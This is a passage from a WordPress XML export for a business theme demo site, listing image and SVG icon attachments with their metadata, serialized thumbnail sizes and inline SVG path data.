		<wp:post_id>660</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:24:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:24:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[aim]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/aim.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/aim.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M489.129,42.371h-32.011V10c0-5.523-4.477-10-10-10s-10,4.477-10,10v38.237l-41.806,41.92    c-42.173-38.385-96.385-59.418-153.76-59.418c-61.083,0-118.511,23.787-161.703,66.979C36.657,140.91,12.87,198.338,12.87,259.421    s23.787,118.511,66.979,161.703c6.719,6.719,13.783,12.967,21.151,18.73l-55.074,55.074c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929l57.452-57.453c36.629,23.742,79.348,36.485,124.031,36.485    c44.901,0,87.818-12.868,124.566-36.833l57.801,57.801c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929    c3.905-3.905,3.906-10.237,0-14.143l-55.467-55.467c7.19-5.656,14.092-11.769,20.661-18.337    c43.192-43.192,66.979-100.62,66.979-161.703c0-34.789-7.614-68.199-22.63-99.303c-2.401-4.974-8.381-7.06-13.353-4.658    c-4.974,2.401-7.059,8.379-4.658,13.353c13.696,28.37,20.641,58.855,20.641,90.608c0,115.068-93.615,208.683-208.683,208.683    S32.867,374.49,32.867,259.421c0-115.068,93.615-208.683,208.683-208.683c52.045,0,101.242,18.958,139.627,53.59l-35.099,35.195    c-28.976-25.325-65.717-39.171-104.527-39.171c-87.711,0-159.069,71.358-159.069,159.069s71.36,159.069,159.071,159.069    s159.069-71.358,159.069-159.069c0-14.146-1.859-28.178-5.527-41.708c-6.436-23.746-18.393-45.726-34.797-64.125l42.276-42.391    c0.013-0.013,0.028-0.024,0.041-0.037c0.012-0.012,0.021-0.025,0.033-0.036l48.621-48.753h37.861c5.523,0,10-4.477,10-10    S494.652,42.371,489.129,42.371z M375.792,222.945c3.206,11.825,4.831,24.097,4.831,36.476    c0,76.683-62.386,139.069-139.069,139.069s-139.069-62.387-139.069-139.069s62.386-139.069,139.069-139.069    c33.479,0,65.202,11.779,90.375,33.362l-41.285,41.397c-13.628-10.428-30.644-16.643-49.09-16.643    c-44.637,0-80.953,36.315-80.953,80.953s36.315,80.953,80.953,80.953s80.953-36.315,80.953-80.953    c0-18.997-6.594-36.473-17.592-50.297l41.232-41.344C360.089,183.686,370.271,202.573,375.792,222.945z M235.828,264.236    c1.952,1.946,4.507,2.919,7.062,2.919c2.563,0,5.127-0.979,7.081-2.938l40.71-40.821c7.426,10.1,11.825,22.556,11.825,36.025    c0,33.609-27.343,60.953-60.953,60.953c-33.61,0-60.953-27.344-60.953-60.953s27.343-60.953,60.953-60.953    c12.935,0,24.933,4.062,34.81,10.961l-40.554,40.664C231.909,254.004,231.917,260.335,235.828,264.236z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="419.22" cy="133.64" r="10"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>money</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/elements__trashed/money/</link>
		<pubDate>Wed, 09 Sep 2020 08:25:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/money.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>663</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:25:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:25:53]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[money]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/money.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/money.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="87.43" cy="406.69" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="470.4" cy="287.44" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M354.647,212.344h-5.797h-3.761h-5.797c-4.854,0-8.802-3.948-8.802-8.802v-8.931c0.001-4.854,3.949-8.802,8.802-8.802    h17.012c3.939,0,7.145,3.204,7.145,7.144c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10c0-14.743-11.818-26.771-26.479-27.127    v-8.584c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10v8.669c-14.798,1.188-26.479,13.602-26.479,28.7v8.931    c0,15.881,12.921,28.802,28.802,28.802h5.797h3.761h5.797c4.854,0,8.802,3.948,8.802,8.801v8.932c0,4.853-3.948,8.801-8.802,8.801    h-17.012c-3.939,0-7.145-3.204-7.145-7.144c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10c0,14.744,11.819,26.771,26.479,27.127    v8.584c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-8.669c14.798-1.188,26.479-13.601,26.479-28.699v-8.932    C383.449,225.264,370.528,212.344,354.647,212.344z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M499.899,339.009c-4.115-9.319-11.613-16.479-21.112-20.159c-9.499-3.68-19.864-3.442-29.183,0.675    c-0.05,0.021-0.1,0.044-0.148,0.066l-62.989,29.048c-5.016,2.313-7.206,8.254-4.894,13.269c2.313,5.016,8.255,7.205,13.269,4.894    l62.908-29.011c4.415-1.927,9.317-2.03,13.813-0.291c4.518,1.751,8.083,5.155,10.04,9.588c1.958,4.433,2.071,9.361,0.321,13.879    c-1.751,4.519-5.155,8.084-9.588,10.041l-128.9,56.914c-20.326,8.975-43.397,8.453-63.301-1.435l-47.185-23.441    c-25.238-12.539-54.498-13.204-80.277-1.819l-0.6,0.264l-34.973-79.21l48.628-21.47c23.239-10.261,49.169-11.087,73.012-2.332    l94.885,34.845c8.475,3.112,12.992,12.594,10.069,21.135c-2.978,8.704-12.491,13.387-21.205,10.44l-73.375-24.818    c-5.233-1.77-10.907,1.037-12.677,6.269c-1.77,5.232,1.037,10.907,6.269,12.677l73.375,24.818    c3.88,1.313,7.831,1.936,11.721,1.936c15.283,0,29.606-9.62,34.816-24.848c6.413-18.746-3.501-39.553-22.099-46.382    l-94.885-34.845c-6.382-2.344-12.888-4.115-19.454-5.321v-55.277c0-54.504,44.343-98.847,98.847-98.847h36.524    c54.505,0,98.848,44.343,98.848,98.847v26.061c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-26.061    c0-57.721-41.365-105.956-96.008-116.636V72.349l25.267-43.222c1.429-2.443,1.755-5.378,0.897-8.075    c-0.858-2.697-2.817-4.905-5.394-6.076l-30.99-14.08c-2.373-1.078-5.072-1.187-7.523-0.305l-22.995,8.276l-20.396-8.153    c-2.345-0.936-4.956-0.951-7.312-0.044l-32.428,12.511c-2.698,1.041-4.813,3.2-5.801,5.919c-0.986,2.719-0.748,5.731,0.655,8.261    l24.881,44.867v30.038c-55.169,10.258-97.072,58.744-97.072,116.84v53.36c-16.52-0.156-33.022,3.199-48.53,10.046l-48.99,21.63    c-2.806-4.199-6.808-7.445-11.615-9.307c-6.172-2.392-12.907-2.236-18.938,0.427l-63.29,27.733    c-3.637,1.594-5.986,5.188-5.986,9.159V502c0,3.473,1.802,6.697,4.76,8.518c1.603,0.985,3.419,1.482,5.24,1.482    c1.542,0,3.088-0.356,4.509-1.074l122.873-62.071c5.926-2.698,10.477-7.518,12.833-13.6c1.925-4.969,2.199-10.302,0.839-15.352    l0.865-0.382c20.327-8.977,43.401-8.454,63.301,1.435l47.185,23.442c25.239,12.536,54.498,13.199,80.277,1.818l128.9-56.914    c9.319-4.114,16.479-11.612,20.159-21.111C504.252,358.692,504.013,348.328,499.899,339.009z M364.391,100.259h-2.84h-36.524    h-1.775V79.641h41.139V100.259z M301.431,27.704l18.049-6.961l20.275,8.105c2.272,0.908,4.798,0.953,7.099,0.123l22.744-8.187    l17.201,7.815l-18.146,31.04h-49.512L301.431,27.704z M137.868,430.678c-0.158,0.07-0.315,0.145-0.47,0.223L28.831,485.745    v-40.524l28.113-13.805c4.958-2.435,7.003-8.427,4.569-13.384c-2.435-4.958-8.425-7.005-13.384-4.569l-19.299,9.476V338.69    l57.329-25.122c1.575-0.694,2.97-0.352,3.661-0.084c0.689,0.268,1.951,0.951,2.647,2.528l2.292,5.19    c0.001,0.002,0.001,0.004,0.002,0.006c0.001,0.002,0.002,0.004,0.003,0.006l45.546,103.154    C141.377,426.782,140.282,429.612,137.868,430.678z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>portfolio</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/elements__trashed/portfolio-2/</link>
		<pubDate>Wed, 09 Sep 2020 08:35:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/portfolio.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>666</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 08:35:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 08:35:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/portfolio.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/portfolio.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M317.5,25.324H195.706c-18.813,0-34.118,15.305-34.118,34.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10V59.441    c0-7.784,6.333-14.117,14.118-14.117H317.5c7.785,0,14.118,6.333,14.118,14.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10    V59.441C351.618,40.628,336.313,25.324,317.5,25.324z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M463.178,106.118H48.822C21.901,106.118,0,128.019,0,154.94v88.801c0,4.433,2.919,8.337,7.171,9.592l6.093,1.797v209.488    c0,12.163,9.896,22.059,22.059,22.059h441.353c12.164,0,22.059-9.896,22.059-22.059V256.603l6.039-1.744    c4.279-1.236,7.226-5.153,7.226-9.607V154.94C512,128.019,490.099,106.118,463.178,106.118z M89.235,466.676H35.323    c-1.135,0-2.058-0.923-2.058-2.058v-53.912h28.76c15.004,0,27.21,12.207,27.21,27.21V466.676z M478.734,464.618    c0.001,1.135-0.922,2.058-2.058,2.058h-53.912v-28.76c0-15.004,12.207-27.21,27.21-27.21h28.76V464.618z M478.736,390.706h-0.001    h-28.76c-26.032,0-47.21,21.179-47.21,47.21v28.76h-293.53v-28.76c0-26.032-21.179-47.21-47.21-47.21h-28.76V261.029    L209.824,313.1v32.135c0,5.523,4.477,10,10,10h72.353c5.523,0,10-4.477,10-10v-31.868l176.559-50.988V390.706z M229.823,335.235    v-29.707c0-0.028,0-0.056,0-0.083V286.5h52.353v48.735H229.823z M492,237.731L302.176,292.55V276.5c0-5.523-4.477-10-10-10    h-72.353c-5.523,0-10,4.477-10,10v15.75L20,236.265V154.94c0-15.893,12.93-28.822,28.822-28.822h40.413v34.618    c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h289.912v34.618c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h44.031    c15.893,0,28.822,12.93,28.822,28.822V237.731z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="409.15" cy="199.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="99.23" cy="199.32" r="10"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-team</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-team/image1-team/</link>
		<pubDate>Wed, 09 Sep 2020 09:53:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-team.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>699</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:53:36]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:53:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-team]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-team.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image1-team.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:959;s:6:"height";i:650;s:4:"file";s:25:"2020/09/image1-team.jpg";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:25:"image1-team-1-300x203.jpg";s:5:"width";i:300;s:6:"height";i:203;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"image1-team-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"image1-team-1-768x521.jpg";s:5:"width";i:768;s:6:"height";i:521;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"image1-team-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"image1-team-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:25:"image1-team-1-959x600.jpg";s:5:"width";i:959;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-single-team</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-team/single-team/image1-single-team/</link>
		<pubDate>Thu, 10 Sep 2020 03:28:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-single-team.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>713</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 03:28:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 03:28:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-single-team]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>711</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-single-team.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image1-single-team.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:530;s:6:"height";i:500;s:4:"file";s:32:"2020/09/image1-single-team.jpg";s:5:"sizes";a:3:{s:6:"medium";a:4:{s:4:"file";s:32:"image1-single-team-1-300x283.jpg";s:5:"width";i:300;s:6:"height";i:283;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:32:"image1-single-team-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:32:"image1-single-team-1-530x400.jpg";s:5:"width";i:530;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-slide-1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/business-consultation/project-slide-1/</link>
		<pubDate>Thu, 10 Sep 2020 10:41:18 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-slide-1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>778</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 10:41:18]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 10:41:18]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-slide-1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>773</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-slide-1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-slide-1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:970;s:6:"height";i:580;s:4:"file";s:29:"2020/09/project-slide-1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:29:"project-slide-1-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:29:"project-slide-1-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"project-slide-1-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:29:"project-slide-1-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:29:"project-slide-1-1-600x580.jpg";s:5:"width";i:600;s:6:"height";i:580;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-details</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/business-consultation/project-details/</link>
		<pubDate>Fri, 11 Sep 2020 03:07:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-details.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>780</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 03:07:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 03:07:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-details]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>773</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-details.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-details.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1174;s:6:"height";i:620;s:4:"file";s:29:"2020/09/project-details.jpg";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:29:"project-details-1-300x158.jpg";s:5:"width";i:300;s:6:"height";i:158;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"project-details-1-1024x541.jpg";s:5:"width";i:1024;s:6:"height";i:541;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:29:"project-details-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"project-details-1-768x406.jpg";s:5:"width";i:768;s:6:"height";i:406;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:29:"project-details-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:29:"project-details-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:30:"project-details-1-1174x600.jpg";s:5:"width";i:1174;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>black-circle</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/business-consultation/black-circle/</link>
		<pubDate>Fri, 11 Sep 2020 03:20:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/black-circle.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>782</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 03:20:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 03:20:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[black-circle]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>773</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/black-circle.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/black-circle.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-10</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/retirement-plan/project-10/</link>
